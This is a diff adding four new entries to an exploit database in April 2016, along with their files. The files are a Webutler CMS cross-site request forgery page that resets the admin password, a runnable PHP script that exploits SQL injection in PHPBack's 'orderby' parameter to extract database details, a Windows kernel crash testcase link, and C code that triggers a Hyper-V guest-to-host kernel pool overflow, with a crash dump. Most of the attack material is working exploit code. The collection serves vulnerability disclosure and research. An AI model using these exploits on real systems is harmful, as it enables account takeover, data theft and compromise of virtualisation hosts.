DB: 2016-04-21

4 new exploits

Webutler CMS 3.2 - Cross-Site Request Forgery
PHPBack 1.3.0 - SQL Injection
Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)
Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow

files.csv

@@ -35924,6 +35924,10 @@ id,file,description,date,author,platform,type,port
 39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
+39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
 39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
+39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
+39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
+39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0

platforms/php/webapps/39707.txt

@@ -0,0 +1,50 @@
+Dear OffSec,
+
+Here is the vulnerability detail as I submitted
+
+*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
+*# Date: 18 April 2016*
+*# Exploit Author: Keerati T. (Post)*
+*# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>*
+*# Software Link: http://webutler.de/download/webutler_v3.2.zip
+<http://webutler.de/download/webutler_v3.2.zip>*
+*# Version: 3.2*
+*# Tested on: Linux*
+
+*1.Description*
+The Webutler is a simple online page editor for static HTML files.
+Webmasters can provide a simple login option for image and text editing to
+their customers. The Webutler is a tool for websites or projects to be
+implemented with a small effort. The project has grown over the years and
+now you can do a lot of things with it.
+The all of administrative function allow any users to perform HTTP request
+without verify the request. This exploit can be performed while the logged
+on user (administrator) visit malicious web page that embedded HTML form.
+
+
+*2. Proof of Concept*
+Only change password function PoC, But other function (add page, delete
+page, etc..) can be exploited.
+
+<html>
+  <body>
+    <form action="http://10.0.0.102/webutler/admin/system/save.php"
+method="POST">
+      <input type="hidden" name="saveuser" value="1" />
+      <!-- administrator user name is "root" -->
+      <input type="hidden" name="username" value="root" />
+      <input type="hidden" name="userpass1" value="111111" />
+      <input type="hidden" name="userpass2" value="111111" />
+      <input type="hidden" name="userlang" value="en" />
+    </form>
+  </body>
+  <script>document.forms[0].submit();</script>
+</html>
+
+
+*3. Timeline*
+11 Apr 2016 - Vulnerability discover.
+11 Apr 2016 - No main contact available on vendor web page. Ask related
+contact that shown on vendor web page instead.
+18 Apr 2016 - No response from related contact and vulnerability disclosed.
+

platforms/php/webapps/39711.php

@@ -0,0 +1,172 @@
+/*
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt
+
+
+Vendor:
+================
+www.phpback.org
+
+
+Product:
+================
+PHPBack v1.3.0
+
+
+Vulnerability Type:
+===================
+SQL Injection
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter.
+By sending SQL Injection query using MySQL XPATH function ExtractValue() we can grab information
+from the errors generated.
+
+This is useful when we get no output except MySQL errors, we can force data extraction through the error. 
+When using ExtractValue() function to generate error, evaluated results of our SQL query will be embedded
+in query error message. Adding a colon "0x3a" to the beginning of the query will ensure parsing will always
+FAIL generating an error along with our extracted data. This method only works on MySQL version >= 5.1, we can
+then use SQL LIMIT function to move thru database informations.
+
+
+Users should upgrade to v1.3.1
+https://github.com/ivandiazwm/phpback/releases
+
+
+Exploit code(s):
+===============
+
+Run from CL...
+*/
+
+<?php
+error_reporting(0);
+#PHPBACK v1.3.0 ORDER BY SQL INJECTION POC
+#Credit: hyp3rlinx 
+#ISR: apparitionsec
+#Site: hyp3rlinx.altervista.org
+#///////////////////////////////////////////////////////////////////
+#
+#run this BOT from CL it does following...
+#1) authenticates to target
+#2) SQL injection using XPATH query to create error and get output
+#   for current MySQL USER(), DATABASE() and VERSION()
+#Supported in MySQL >= 5.1 only
+#====================================================================
+
+$email=$argv[1];
+$pwd=$argv[2];
+
+if($argc<3){
+echo "PHPBack 1.3.0 SQL Injection POC\r\n";
+echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
+echo "Supported in MySQL >= 5.1 versions only\r\n";
+echo "==========================================================\r\n";
+echo "Enter Creds: <email> <password>\r\n";
+echo "*** by hyp3rlinx *** \r\n";
+exit();
+}
+
+$target="localhost";
+$creds="email=$email&password=$pwd"; 
+
+$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
+sock_chk($fp);
+
+#authenticate
+    $out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n";
+    $out .= "Host: $target\r\n";
+    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
+    $out .= 'Content-Length: ' . strlen($creds) . "\r\n";
+    $out .= "Connection: Close\r\n\r\n";
+    fwrite($fp, $out);
+    fwrite($fp, $creds);
+$phpsess="";
+$res="";
+    while (!feof($fp)) {
+        $res .= fgets($fp, 128);
+if(strpos($res,"\r\n\r\n")!==FALSE){break;}
+    }
+
+$sess=get_session($fp);
+function get_session($sock){
+global $res;
+$idx=strpos($res,"PHPSESSID");
+$sess=substr($res,$idx,38);
+return $sess;
+}
+
+#SQL Injection  
+$sql="search=1&orderby=title,extractvalue(0x0a,concat(0x0a,(select USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION())))\r\n";
+
+$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
+sock_chk($fp);
+
+    $out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n";
+    $out .= "Host: $target\r\n";
+    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
+    $out .= 'Content-Length: ' . strlen($sql) . "\r\n";
+$out .= "Cookie: " . $sess."\r\n";
+    $out .= "Connection: Close\r\n\r\n";
+    fwrite($fp, $out);
+    fwrite($fp, $sql);
+    while (!feof($fp)) {
+        echo fgets($fp, 128);
+    }
+    fclose($fp);
+function sock_chk(&$fp){
+if (!$fp) {echo "Cant connect!";exit();} 
+}
+
+?> 
+
+
+/*
+Disclosure Timeline:
+=====================================
+Vendor Notification: April 17, 2016
+Vendor Confirms: April 17, 2016
+Vendor Release Fixed Version: April 19, 2016
+April 19, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+================
+Medium
+
+
+Description:
+==================================================
+
+Request Method(s):        [+]  POST
+
+
+Vulnerable Product:       [+] PHPBack v1.3.0
+
+
+Vulnerable Parameter(s):  [+] 'orderby'
+
+====================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
+The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx.
+
+by hyp3rlinx
+*/

platforms/win64/dos/39712.txt

@@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=707
+
+The attached testcases crashes Windows 7 64-bit while attempting to write to an unmapped memory region. On 32-bit Windows 7 it triggers a null pointer read.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39712.zip
+

platforms/windows/dos/39713.c

@@ -0,0 +1,390 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=688
+
+This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to the Host.
+
+This function potentially allocates a buffer based on the addresses sent.
+The number of entries is determined by dividing the length of the data by 6:
+
+.text:000000000001D717 mov eax, 0AAAAAAABh
+.text:000000000001D71C mov r13b, 1
+.text:000000000001D71F mul r14d
+.text:000000000001D722 mov ebp, edx
+.text:000000000001D724 shr ebp, 2
+.text:000000000001D727 test ebp, ebp ; ebp=r14d//6
+.text:000000000001D729 jz loc_31B04
+.text:000000000001D72F
+.text:000000000001D72F loc_1D72F: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+144CEj
+.text:000000000001D72F cmp ebp, [rbx+0EE8h]
+.text:000000000001D735 jz loc_31B2B
+.text:000000000001D73B mov r8d, 'mcMV' ; Tag
+.text:000000000001D741 mov rdx, r14 ; NumberOfBytes
+.text:000000000001D744 mov ecx, 200h ; PoolType
+.text:000000000001D749 mov r12, r14
+.text:000000000001D74C call cs:__imp_ExAllocatePoolWithTag .text:000000000001D752 mov r14, rax
+.text:000000000001D755 test rax, rax
+.text:000000000001D758 jz loc_1D7E8
+.text:000000000001D75E mov r8, r12 ; Size
+.text:000000000001D761 mov rdx, r15 ; Src
+.text:000000000001D764 mov rcx, rax ; Dst
+.text:000000000001D767 call memmove
+
+An interesting test is located at 0x1D72F.
+If the number of entries is identical to the currently stored one, then we jump to this piece of code:
+
+.text:0000000000031B2B loc_31B2B: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+F5j
+.text:0000000000031B2B mov rcx, [rbx+0EE0h] ; Dst
+.text:0000000000031B32 mov r8, r14 ; Size
+.text:0000000000031B35 mov rdx, r15 ; Src
+.text:0000000000031B38 call memmove
+
+Note that the size of the copy operation is the size of the data. As the division is dropping the remainder component, we can overflow the allocation by 1 to 5 bytes doing the following:
+- call this function with data of size 6*x
+- call this function again with size 6*x+y with 1<=y<=5
+  - then 6*x bytes will be allocated and stored at 0xee0
+  - and x will be saved at 0xee8;
+  - x will be compared with what is at 0xee8
+  - being equal it will proceed copying 6*x+y in a buffer of 6*x bytes at 0xee0
+
+If exploited successfully (not sure if it's doable), it would lead to code execution in the context of the Host R0.
+
+Please note that this issue has been silently fixed in Windows Server 2016 TP4 (and maybe prior).
+
+PoC (put it and call it somewhere useful in rndis_filter.c):
+*/
+
+static int rndis_pool_overflow(struct rndis_device *rdev)
+{
+  int ret;
+  struct net_device *ndev = rdev->net_dev->ndev;
+  struct rndis_request *request;
+  struct rndis_set_request *set;
+  struct rndis_set_complete *set_complete;
+  u32 extlen = 16 * 6;
+  unsigned long t;
+
+  request = get_rndis_request(
+    rdev, RNDIS_MSG_SET,
+    RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen);
+
+  if (!request)
+    return -ENOMEM;
+
+  set = &request->request_msg.msg.set_req;
+  set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
+  set->info_buflen = extlen;
+  set->info_buf_offset = sizeof(struct rndis_set_request);
+  set->dev_vc_handle = 0;
+
+  ret = rndis_filter_send_request(rdev, request);
+  if (ret != 0)
+    goto cleanup;
+
+  t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
+  if (t == 0)
+    return -ETIMEDOUT;
+  else {
+    set_complete = &request->response_msg.msg.set_complete;
+    if (set_complete->status != RNDIS_STATUS_SUCCESS) {
+      printk(KERN_INFO "failed to set multicast list: 0x%x\n",
+        set_complete->status);
+      ret = -EINVAL;
+    }
+  }
+
+  put_rndis_request(rdev, request);
+  request = get_rndis_request(rdev, RNDIS_MSG_SET,
+    RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen + 5);
+
+  if (!request)
+    return -ENOMEM;
+
+  set = &request->request_msg.msg.set_req;
+  set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
+  set->info_buflen = extlen + 5;
+  set->info_buf_offset = sizeof(struct rndis_set_request);
+  set->dev_vc_handle = 0;
+
+  ret = rndis_filter_send_request(rdev, request);
+  if (ret != 0)
+    goto cleanup;
+
+  t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
+  if (t == 0)
+    return -ETIMEDOUT;
+  else {
+    set_complete = &request->response_msg.msg.set_complete;
+    if (set_complete->status != RNDIS_STATUS_SUCCESS) {
+      printk(KERN_INFO "failed to set multicast list: 0x%x\n",
+        set_complete->status);
+      ret = -EINVAL;
+    }
+ }
+
+cleanup:
+  put_rndis_request(rdev, request);
+
+  return ret;
+}
+
+/*
+Crash dump (with Special Pool enabled for vmswitch.sys):
+
+7: kd> !analyze -v
+
+*******************************************************************************
+
+* *
+
+* Bugcheck Analysis *
+
+* *
+
+*******************************************************************************
+
+DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
+
+An attempt was made to access a pageable (or completely invalid) address at an
+
+interrupt request level (IRQL) that is too high. This is usually
+
+caused by drivers using improper addresses.
+
+If kernel debugger is available get stack backtrace.
+
+Arguments:
+
+Arg1: ffffcf81085c9000, memory referenced
+
+Arg2: 0000000000000002, IRQL
+
+Arg3: 0000000000000001, value 0 = read operation, 1 = write operation
+
+Arg4: fffff8005fad3249, address which referenced memory
+
+Debugging Details:
+
+------------------
+
+DUMP_CLASS: 1
+
+DUMP_QUALIFIER: 401
+
+BUILD_VERSION_STRING: 9600.18146.amd64fre.winblue_ltsb.151121-0600
+
+...
+
+BASEBOARD_VERSION: 
+
+DUMP_TYPE: 1
+
+BUGCHECK_P1: ffffcf81085c9000
+
+BUGCHECK_P2: 2
+
+BUGCHECK_P3: 1
+
+BUGCHECK_P4: fffff8005fad3249
+
+WRITE_ADDRESS: ffffcf81085c9000 Special pool
+
+CURRENT_IRQL: 2
+
+FAULTING_IP: 
+
+vmswitch!memcpy+49
+
+fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
+
+CPU_COUNT: 8
+
+CPU_MHZ: c88
+
+CPU_VENDOR: GenuineIntel
+
+CPU_FAMILY: 6
+
+CPU_MODEL: 1a
+
+CPU_STEPPING: 4
+
+CPU_MICROCODE: 6,1a,4,0 (F,M,S,R) SIG: 11'00000000 (cache) 11'00000000 (init)
+
+DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT
+
+BUGCHECK_STR: AV
+
+PROCESS_NAME: System
+
+ANALYSIS_SESSION_HOST: KOSTYAK-G7700
+
+ANALYSIS_SESSION_TIME: 12-31-2015 21:26:14.0206
+
+ANALYSIS_VERSION: 10.0.10586.567 amd64fre
+
+TRAP_FRAME: ffffd00187f46840 -- (.trap 0xffffd00187f46840)
+
+NOTE: The trap frame does not contain all registers.
+
+Some register values may be zeroed or incorrect.
+
+rax=0000000055555500 rbx=0000000000000000 rcx=ffffcf81085c9001
+
+rdx=0000000000001fc0 rsi=0000000000000000 rdi=0000000000000000
+
+rip=fffff8005fad3249 rsp=ffffd00187f469d8 rbp=0000000000000010
+
+r8=0000000000000004 r9=0000000000000000 r10=0000000000000000
+
+r11=ffffcf81085c8fa0 r12=0000000000000000 r13=0000000000000000
+
+r14=0000000000000000 r15=0000000000000000
+
+iopl=0 nv up ei pl nz na pe nc
+
+vmswitch!memcpy+0x49:
+
+fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al ds:ffffcf81`085c9000=??
+
+Resetting default scope
+
+LAST_CONTROL_TRANSFER: from fffff8038a3633e9 to fffff8038a3578a0
+
+STACK_TEXT: 
+
+ffffd001`87f466f8 fffff803`8a3633e9 : 00000000`0000000a ffffcf81`085c9000 00000000`00000002 
+
+00000000`00000001 : nt!KeBugCheckEx
+
+ffffd001`87f46700 fffff803`8a361c3a : 00000000`00000001 ffffe000`57002000 ffffd001`87f46900 
+
+00000000`00000004 : nt!KiBugCheckDispatch+0x69
+
+ffffd001`87f46840 fffff800`5fad3249 : fffff800`5fad9b3d ffffe000`57002000 00000000`0000000c 
+
+ffffe000`57002000 : nt!KiPageFault+0x23a
+
+ffffd001`87f469d8 fffff800`5fad9b3d : ffffe000`57002000 00000000`0000000c ffffe000`57002000 
+
+ffffd001`87f46b00 : vmswitch!memcpy+0x49
+
+ffffd001`87f469e0 fffff800`5fac4792 : 00000000`00000000 ffffd001`87f46ac0 00000000`01000400 
+
+ffffe000`57002000 : vmswitch!VmsMpCommonPvtHandleMulticastOids+0x144fd
+
+ffffd001`87f46a60 fffff800`5fac3dc4 : 00000000`c00000bb 00000000`01010209 ffffcf81`06b62c78 
+
+00000000`000000d0 : vmswitch!VmsMpCommonPvtSetRequestCommon+0x13e
+
+ffffd001`87f46af0 fffff800`5fac3cf9 : ffffcf81`06b62b00 00000000`00000000 fffff800`5fac3a20 
+
+ffffe000`53d8d880 : vmswitch!VmsMpCommonSetRequest+0xa4
+
+ffffd001`87f46b60 fffff800`5fac3e8b : 00000000`00000000 fffff800`00000000 ffffe000`57005c10 
+
+ffff68b8`dcfa8dfd : vmswitch!VmsVmNicPvtRndisDeviceSetRequest+0x55
+
+ffffd001`87f46bb0 fffff800`5fac3aa3 : ffffe000`570c5f70 ffffe000`53d8d9c0 ffffe000`53d8d880 
+
+fffff803`8a29b9f9 : vmswitch!RndisDevHostHandleSetMessage+0x77
+
+ffffd001`87f46bf0 fffff803`8a2ee2a3 : ffffcf81`06b58fb0 ffffe000`57005c10 00000000`00000000 
+
+ffffe000`00000000 : vmswitch!RndisDevHostControlMessageWorkerRoutine+0x83
+
+ffffd001`87f46c20 fffff803`8a2984bf : fffff800`5e842e00 fffff803`8a2ee1a8 ffffe000`53d8d880 
+
+00000000`00000000 : nt!IopProcessWorkItem+0xfb
+
+ffffd001`87f46c90 fffff803`8a305554 : 00000000`00000000 ffffe000`53d8d880 00000000`00000080 
+
+ffffe000`53d8d880 : nt!ExpWorkerThread+0x69f
+
+ffffd001`87f46d40 fffff803`8a35dec6 : ffffd001`88741180 ffffe000`53d8d880 ffffd001`8874d3c0 
+
+00000000`00000000 : nt!PspSystemThreadStartup+0x58
+
+ffffd001`87f46da0 00000000`00000000 : ffffd001`87f47000 ffffd001`87f41000 00000000`00000000 
+
+00000000`00000000 : nt!KiStartSystemThread+0x16
+
+STACK_COMMAND: kb
+
+THREAD_SHA1_HASH_MOD_FUNC: abaf49d1b3c5b02fccc8786e1ffe670ffc7abc52
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 95f6cd8078b8f21385352dcdeabdb4de53e87ac0
+
+THREAD_SHA1_HASH_MOD: 7e0f522feda778d9b7c0da52391383d6f8569ca6
+
+FOLLOWUP_IP: 
+
+vmswitch!memcpy+49
+
+fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
+
+FAULT_INSTR_CODE: 75ff4188
+
+SYMBOL_STACK_INDEX: 3
+
+SYMBOL_NAME: vmswitch!memcpy+49
+
+FOLLOWUP_NAME: MachineOwner
+
+MODULE_NAME: vmswitch
+
+IMAGE_NAME: vmswitch.sys
+
+DEBUG_FLR_IMAGE_TIMESTAMP: 55c21a2e
+
+BUCKET_ID_FUNC_OFFSET: 49
+
+FAILURE_BUCKET_ID: AV_VRF_vmswitch!memcpy
+
+BUCKET_ID: AV_VRF_vmswitch!memcpy
+
+PRIMARY_PROBLEM_CLASS: AV_VRF_vmswitch!memcpy
+
+TARGET_TIME: 2016-01-01T05:23:07.000Z
+
+OSBUILD: 9600
+
+OSSERVICEPACK: 0
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+SUITE_MASK: 272
+
+PRODUCT_TYPE: 3
+
+OSPLATFORM_TYPE: x64
+
+OSNAME: Windows 8.1
+
+OSEDITION: Windows 8.1 Server TerminalServer SingleUserTS
+
+OS_LOCALE: 
+
+USER_LCID: 0
+
+OSBUILD_TIMESTAMP: 2015-11-21 08:42:09
+
+BUILDDATESTAMP_STR: 151121-0600
+
+BUILDLAB_STR: winblue_ltsb
+
+BUILDOSVER_STR: 6.3.9600.18146.amd64fre.winblue_ltsb.151121-0600
+
+ANALYSIS_SESSION_ELAPSED_TIME: 465
+
+ANALYSIS_SOURCE: KM
+
+FAILURE_ID_HASH_STRING: km:av_vrf_vmswitch!memcpy
+
+FAILURE_ID_HASH: {f6dcfc99-d58f-1ff6-59d1-7239f62b292b}
+
+Followup: MachineOwner
+
+---------
+*/